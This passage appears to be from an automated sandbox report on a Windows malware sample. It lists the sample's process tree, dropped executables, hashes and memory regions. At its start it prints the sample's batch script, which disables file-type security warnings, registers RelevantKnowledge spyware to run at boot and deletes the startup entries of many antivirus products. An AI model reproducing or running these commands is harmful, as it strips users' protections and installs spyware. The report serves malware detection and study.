"SUPERAntiSpyware" /f ) else ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg64.exe" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlservice.exe" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -boot" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32 Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64 Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64 )4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\D1FC.exeC:\Users\Admin\AppData\Local\Temp\D1FC.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /Q /C C:\Users\Admin\AppData\Local\Temp/s.bat2⤵
- Drops startup file
-
C:\Users\Admin\AppData\Local\Temp\D420.exeC:\Users\Admin\AppData\Local\Temp\D420.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\D420.exeC:\Users\Admin\AppData\Local\Temp\D420.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3908 -s 14523⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\D951.exeC:\Users\Admin\AppData\Local\Temp\D951.exe1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\2F42.exeC:\Users\Admin\AppData\Local\Temp\2F42.exe1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 496 -s 7322⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 496 -s 7482⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 496 -s 8442⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 496 -s 8922⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 496 -s 8882⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\Runtimebroker.exeMD5
16e7880b76dbc82d50fd96f38d1c2692
SHA1b8b49ef406f74e50c7386f2fecbff18447ad9f4d
SHA2569ccef739ddc3b6688be2a72a754c95f300f24d3b5181a3896328681bf933b4d7
SHA51269071850ce17baaa5884f9531e2c7632b61a5777d58b826b1365d6f651f647a3521d456ceed29fbf5cf47ebf83176634371e7e5245a44d4b13b0855ffe10d6e3
-
C:\ProgramData\Runtimebroker.exeMD5
16e7880b76dbc82d50fd96f38d1c2692
SHA1b8b49ef406f74e50c7386f2fecbff18447ad9f4d
SHA2569ccef739ddc3b6688be2a72a754c95f300f24d3b5181a3896328681bf933b4d7
SHA51269071850ce17baaa5884f9531e2c7632b61a5777d58b826b1365d6f651f647a3521d456ceed29fbf5cf47ebf83176634371e7e5245a44d4b13b0855ffe10d6e3
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logMD5
c558fdaa3884f969f1ec904ae7bbd991
SHA1b4f85d04f6bf061a17f52c264c065b786cfd33ff
SHA2563e2559b6ca355d011b05b1fcf35ed8b2375586fe6bb01bc367f24eb8ac82975e
SHA5126523c778fd9fab0085fafe7b4049e591403865212cc25109cb11f11584c7258bc15e0a5524d089d0f662151b22f3f8e6f871091cec57064c69a9a95903f9e7d4
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
c3dec36e807237cbf1861e68cd19b4a6
SHA18d9faa98918bc2ce525b0a8003558c5eacb8a445
SHA25653cb6ecdc9957bd1cb464e8a5ba99bad2adaeb69764accfe7ce6e817c27a1340
SHA5123fdfb356726beb9d8f1f184210257c97715abf738bee1523711ed2c100c5e8f492915dd3e772d6236e4b7caf7f459e231332d5bd285c298eea8d3589be5afb25
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
02c09d0f396bec915b5fe1c5fb75ff4f
SHA10f01c003a1fed687589ea9d9b20d05b2efe77605
SHA256d732b27eff7f7511a53fa14c8a3ad96dacd6f9153a04d83f24ea813d5943fd47
SHA512d85ee25fe1a5ebe65810718cab3da3e4a9d3e407317bf2cb6a0cb916e526623153a2d80bbb6c7de25e1cddf0645e1de8c4cbc3bd8ed1b9f1a8b9774332919f66
-
C:\Users\Admin\AppData\Local\Temp\2F42.exeMD5
4297e9e27602c1ab910f6c214a2b3ce7
SHA1a2ee7d601157c05818a3fd2dd46e51b272078b95
SHA256c6ce666831320963b654b1730a946524fb370c4d7a41822deee3bbe6f367fb8d
SHA512a0e4e3a61e564b27d86683a56b54b9305d6566a0388d33c05644b88a5fb071e99e8bb1972a9e05cd2fe963420a0a9a45a61a8de6709914be3d9d8982916759e5
-
C:\Users\Admin\AppData\Local\Temp\2F42.exeMD5
4297e9e27602c1ab910f6c214a2b3ce7
SHA1a2ee7d601157c05818a3fd2dd46e51b272078b95
SHA256c6ce666831320963b654b1730a946524fb370c4d7a41822deee3bbe6f367fb8d
SHA512a0e4e3a61e564b27d86683a56b54b9305d6566a0388d33c05644b88a5fb071e99e8bb1972a9e05cd2fe963420a0a9a45a61a8de6709914be3d9d8982916759e5
-
C:\Users\Admin\AppData\Local\Temp\CFC9.exeMD5
16e7880b76dbc82d50fd96f38d1c2692
SHA1b8b49ef406f74e50c7386f2fecbff18447ad9f4d
SHA2569ccef739ddc3b6688be2a72a754c95f300f24d3b5181a3896328681bf933b4d7
SHA51269071850ce17baaa5884f9531e2c7632b61a5777d58b826b1365d6f651f647a3521d456ceed29fbf5cf47ebf83176634371e7e5245a44d4b13b0855ffe10d6e3
-
C:\Users\Admin\AppData\Local\Temp\CFC9.exeMD5
16e7880b76dbc82d50fd96f38d1c2692
SHA1b8b49ef406f74e50c7386f2fecbff18447ad9f4d
SHA2569ccef739ddc3b6688be2a72a754c95f300f24d3b5181a3896328681bf933b4d7
SHA51269071850ce17baaa5884f9531e2c7632b61a5777d58b826b1365d6f651f647a3521d456ceed29fbf5cf47ebf83176634371e7e5245a44d4b13b0855ffe10d6e3
-
C:\Users\Admin\AppData\Local\Temp\D1FC.exeMD5
b19ac380411ed5d8b5a7e7e0c1da61a6
SHA19665c20336a5ce437bbf7b564370bfa43e99954c
SHA256aba88a19b2f6e2cf9a6a41ab8661d83c433acec363028f58dd74d37e335c7619
SHA51273b4e3555cf9496a7138a2c7071ed81a754493afaf15f604a305f3eb051ed72645731a6174b0934f24371dbe5bd8c0185516f87778a018d84df4fff8aea0c208
-
C:\Users\Admin\AppData\Local\Temp\D1FC.exeMD5
b19ac380411ed5d8b5a7e7e0c1da61a6
SHA19665c20336a5ce437bbf7b564370bfa43e99954c
SHA256aba88a19b2f6e2cf9a6a41ab8661d83c433acec363028f58dd74d37e335c7619
SHA51273b4e3555cf9496a7138a2c7071ed81a754493afaf15f604a305f3eb051ed72645731a6174b0934f24371dbe5bd8c0185516f87778a018d84df4fff8aea0c208
-
C:\Users\Admin\AppData\Local\Temp\D420.exeMD5
5707ddada5b7ea6bef434cd294fa12e1
SHA145bb285a597b30e100ed4b15d96a29d718697e5e
SHA25685205aa3ad824b5172d5da841d253c3a54aff5d00eb2c208029e9453008f132c
SHA51291cbdbf8da7e4e34de45a99359bdc321a66d6646ed14a1042346824c8daa6237281eff3b00fd162009c5e3204e5a7cd3b944f05e18b7f9066d0f9dd16b56bf13
-
C:\Users\Admin\AppData\Local\Temp\D420.exeMD5
5707ddada5b7ea6bef434cd294fa12e1
SHA145bb285a597b30e100ed4b15d96a29d718697e5e
SHA25685205aa3ad824b5172d5da841d253c3a54aff5d00eb2c208029e9453008f132c
SHA51291cbdbf8da7e4e34de45a99359bdc321a66d6646ed14a1042346824c8daa6237281eff3b00fd162009c5e3204e5a7cd3b944f05e18b7f9066d0f9dd16b56bf13
-
C:\Users\Admin\AppData\Local\Temp\D420.exeMD5
5707ddada5b7ea6bef434cd294fa12e1
SHA145bb285a597b30e100ed4b15d96a29d718697e5e
SHA25685205aa3ad824b5172d5da841d253c3a54aff5d00eb2c208029e9453008f132c
SHA51291cbdbf8da7e4e34de45a99359bdc321a66d6646ed14a1042346824c8daa6237281eff3b00fd162009c5e3204e5a7cd3b944f05e18b7f9066d0f9dd16b56bf13
-
C:\Users\Admin\AppData\Local\Temp\D951.exeMD5
717d65dba56f47e540dca074c3977b3d
SHA1d58aa30f826f41663e693f0ad930fdce584f1672
SHA25661fb1160ae372d9ba1c95400d5439450c6a66cdf073fa50ee2d5d10c4952cbb3
SHA512b06e4358411eb8f6315c574922c021bd57218b3e6a0ed727df6b44e20e7818d40fb0347050ce9145ea7e0fd56a7fa93a2358e524c0df030d6d44067c7c83510d
-
C:\Users\Admin\AppData\Local\Temp\D951.exeMD5
717d65dba56f47e540dca074c3977b3d
SHA1d58aa30f826f41663e693f0ad930fdce584f1672
SHA25661fb1160ae372d9ba1c95400d5439450c6a66cdf073fa50ee2d5d10c4952cbb3
SHA512b06e4358411eb8f6315c574922c021bd57218b3e6a0ed727df6b44e20e7818d40fb0347050ce9145ea7e0fd56a7fa93a2358e524c0df030d6d44067c7c83510d
-
C:\Users\Admin\AppData\Local\Temp\s.batMD5
cedbfd38cc5942a15b6757a67910f83c
SHA1cb422b63c254204290f2e3a165b0fca0b4beef57
SHA2562f2d0e136d21c19027890d11c6cfbfd392674bb8df04767494bd8e57a2863d87
SHA5121f08ec7170e648cccef1a5646c9ce06c23d781a164b9209a5834a97074bc1e8fd8bcf7729b1e50ec3f44d53f02a2934224e5b03dbfb9f2d35a30a14eae8e464c
-
\Users\Admin\AppData\LocalLow\sqlite3.dllMD5
f964811b68f9f1487c2b41e1aef576ce
SHA1b423959793f14b1416bc3b7051bed58a1034025f
SHA25683bc57dcf282264f2b00c21ce0339eac20fcb7401f7c5472c0cd0c014844e5f7
SHA512565b1a7291c6fcb63205907fcd9e72fc2e11ca945afc4468c378edba882e2f314c2ac21a7263880ff7d4b84c2a1678024c1ac9971ac1c1de2bfa4248ec0f98c4
-
memory/420-269-0x0000000003010000-0x000000000301B000-memory.dmpFilesize
44KB
-
memory/420-268-0x0000000003020000-0x0000000003027000-memory.dmpFilesize
28KB
-
memory/420-248-0x0000000000000000-mapping.dmp
-
memory/496-220-0x0000000000000000-mapping.dmp
-
memory/496-231-0x00000000048A0000-0x0000000004931000-memory.dmpFilesize
580KB
-
memory/496-243-0x0000000000400000-0x0000000002CA9000-memory.dmpFilesize
40.7MB
-
memory/508-507-0x0000000000150000-0x0000000000159000-memory.dmpFilesize
36KB
-
memory/508-506-0x0000000000160000-0x0000000000165000-memory.dmpFilesize
20KB
-
memory/508-505-0x0000000000000000-mapping.dmp
-
memory/784-153-0x0000000000400000-0x0000000002C7D000-memory.dmpFilesize
40.5MB
-
memory/784-150-0x0000000000000000-mapping.dmp
-
memory/900-500-0x0000000002C00000-0x0000000002C04000-memory.dmpFilesize
16KB
-
memory/900-502-0x00000000029F0000-0x00000000029F9000-memory.dmpFilesize
36KB
-
memory/900-493-0x0000000000000000-mapping.dmp
-
memory/1192-143-0x0000000006120000-0x0000000006121000-memory.dmpFilesize
4KB
-
memory/1192-148-0x0000000005B00000-0x0000000005B01000-memory.dmpFilesize
4KB
-
memory/1192-167-0x0000000007100000-0x0000000007101000-memory.dmpFilesize
4KB
-
memory/1192-149-0x0000000005C60000-0x0000000005C61000-memory.dmpFilesize
4KB
-
memory/1192-144-0x0000000005A00000-0x0000000005A01000-memory.dmpFilesize
4KB
-
memory/1192-133-0x0000000000000000-mapping.dmp
-
memory/1192-146-0x0000000005AA0000-0x0000000005AA1000-memory.dmpFilesize
4KB
-
memory/1192-145-0x0000000005A60000-0x0000000005A61000-memory.dmpFilesize
4KB
-
memory/1192-139-0x0000000000BB0000-0x0000000000BB1000-memory.dmpFilesize
4KB
-
memory/1192-140-0x00000000774D0000-0x000000007765E000-memory.dmpFilesize
1.6MB
-
memory/1192-161-0x0000000006EC0000-0x0000000006EC1000-memory.dmpFilesize
4KB
-
memory/1192-178-0x00000000074B0000-0x00000000074B1000-memory.dmpFilesize
4KB
-
memory/1192-175-0x00000000073B0000-0x00000000073B1000-memory.dmpFilesize
4KB
-
memory/1192-164-0x00000000075C0000-0x00000000075C1000-memory.dmpFilesize
4KB
-
memory/1340-184-0x00000000090D0000-0x00000000090D1000-memory.dmpFilesize
4KB
-
memory/1340-158-0x0000000000000000-mapping.dmp
-
memory/1340-165-0x0000000004A90000-0x0000000004A91000-memory.dmpFilesize
4KB
-
memory/1340-168-0x0000000007310000-0x0000000007311000-memory.dmpFilesize
4KB
-
memory/1340-169-0x0000000007BC0000-0x0000000007BC1000-memory.dmpFilesize
4KB
-
memory/1340-171-0x0000000007E20000-0x0000000007E21000-memory.dmpFilesize
4KB
-
memory/1340-172-0x0000000007B90000-0x0000000007B91000-memory.dmpFilesize
4KB
-
memory/1340-163-0x0000000007420000-0x0000000007421000-memory.dmpFilesize
4KB
-
memory/1340-162-0x0000000004890000-0x0000000004891000-memory.dmpFilesize
4KB
-
memory/1340-183-0x00000000093D0000-0x00000000093D1000-memory.dmpFilesize
4KB
-
memory/1340-204-0x0000000004A93000-0x0000000004A94000-memory.dmpFilesize
4KB
-
memory/1340-185-0x0000000009330000-0x0000000009331000-memory.dmpFilesize
4KB
-
memory/1340-166-0x0000000004A92000-0x0000000004A93000-memory.dmpFilesize
4KB
-
memory/1624-492-0x0000000000EA0000-0x0000000000EA6000-memory.dmpFilesize
24KB
-
memory/1624-438-0x0000000000000000-mapping.dmp
-
memory/1624-494-0x0000000000E90000-0x0000000000E9C000-memory.dmpFilesize
48KB
-
memory/1944-501-0x0000000000000000-mapping.dmp
-
memory/1944-504-0x00000000007C0000-0x00000000007C9000-memory.dmpFilesize
36KB
-
memory/1944-503-0x00000000007D0000-0x00000000007D5000-memory.dmpFilesize
20KB
-
memory/2040-239-0x0000000000000000-mapping.dmp
-
memory/2040-244-0x0000000000D90000-0x0000000000D97000-memory.dmpFilesize
28KB
-
memory/2040-246-0x0000000000D80000-0x0000000000D8C000-memory.dmpFilesize
48KB
-
memory/2428-345-0x0000000000000000-mapping.dmp
-
memory/2428-440-0x00000000026F0000-0x00000000026F9000-memory.dmpFilesize
36KB
-
memory/2428-437-0x0000000002700000-0x0000000002705000-memory.dmpFilesize
20KB
-
memory/2440-114-0x0000000000400000-0x0000000000409000-memory.dmpFilesize
36KB
-
memory/2440-115-0x0000000000402E1A-mapping.dmp
-
memory/2832-117-0x0000000001050000-0x0000000001066000-memory.dmpFilesize
88KB
-
memory/3132-155-0x0000000000000000-mapping.dmp
-
memory/3252-128-0x0000000000400000-0x0000000002C7D000-memory.dmpFilesize
40.5MB
-
memory/3252-127-0x0000000002CD0000-0x0000000002D0B000-memory.dmpFilesize
236KB
-
memory/3252-118-0x0000000000000000-mapping.dmp
-
memory/3412-147-0x0000000000400000-0x0000000002D86000-memory.dmpFilesize
41.5MB
-
memory/3412-142-0x0000000003400000-0x0000000003643000-memory.dmpFilesize
2.3MB
-
memory/3412-154-0x0000000005240000-0x0000000005451000-memory.dmpFilesize
2.1MB
-
memory/3412-121-0x0000000000000000-mapping.dmp
-
memory/3412-156-0x0000000000400000-0x0000000002D86000-memory.dmpFilesize
41.5MB
-
memory/3540-232-0x0000000002A70000-0x0000000002ADB000-memory.dmpFilesize
428KB
-
memory/3540-230-0x0000000002AE0000-0x0000000002B54000-memory.dmpFilesize
464KB
-
memory/3540-223-0x0000000000000000-mapping.dmp
-
memory/3732-136-0x00000000053C0000-0x00000000058BE000-memory.dmpFilesize
5.0MB
-
memory/3732-132-0x00000000054C0000-0x00000000054C1000-memory.dmpFilesize
4KB
-
memory/3732-131-0x00000000058C0000-0x00000000058C1000-memory.dmpFilesize
4KB
-
memory/3732-135-0x0000000005640000-0x0000000005641000-memory.dmpFilesize
4KB
-
memory/3732-129-0x0000000000B20000-0x0000000000B21000-memory.dmpFilesize
4KB
-
memory/3732-124-0x0000000000000000-mapping.dmp
-
memory/3732-187-0x00000000056F0000-0x0000000005711000-memory.dmpFilesize
132KB
-
memory/3908-202-0x0000000000400000-0x0000000000495000-memory.dmpFilesize
596KB
-
memory/3908-191-0x000000000044003F-mapping.dmp
-
memory/3908-188-0x0000000000400000-0x0000000000495000-memory.dmpFilesize
596KB
-
memory/3936-344-0x0000000000100000-0x000000000010F000-memory.dmpFilesize
60KB
-
memory/3936-343-0x0000000000110000-0x0000000000119000-memory.dmpFilesize
36KB
-
memory/3936-274-0x0000000000000000-mapping.dmp
-
memory/3988-116-0x0000000000030000-0x000000000003A000-memory.dmpFilesize
40KB
-
memory/3996-207-0x00000000072F2000-0x00000000072F3000-memory.dmpFilesize
4KB
-
memory/3996-194-0x0000000000000000-mapping.dmp
-
memory/3996-205-0x0000000008410000-0x0000000008411000-memory.dmpFilesize
4KB
-
memory/3996-224-0x0000000009CE0000-0x0000000009E3B000-memory.dmpFilesize
1.4MB
-
memory/3996-206-0x00000000072F0000-0x00000000072F1000-memory.dmpFilesize
4KB
-
memory/3996-219-0x00000000072F3000-0x00000000072F4000-memory.dmpFilesize
4KB
-
memory/3996-217-0x000000000A0E0000-0x000000000A0E1000-memory.dmpFilesize
4KB
-
memory/4020-254-0x0000000009050000-0x0000000009083000-memory.dmpFilesize
204KB
-
memory/4020-225-0x0000000000000000-mapping.dmp
-
memory/4020-233-0x0000000006CE0000-0x0000000006CE1000-memory.dmpFilesize
4KB
-
memory/4020-234-0x0000000006CE2000-0x0000000006CE3000-memory.dmpFilesize
4KB
-
memory/4020-270-0x000000007F4F0000-0x000000007F4F1000-memory.dmpFilesize
4KB
-
memory/4020-271-0x0000000006CE3000-0x0000000006CE4000-memory.dmpFilesize
4KB
-
memory/4060-499-0x0000000000000000-mapping.dmp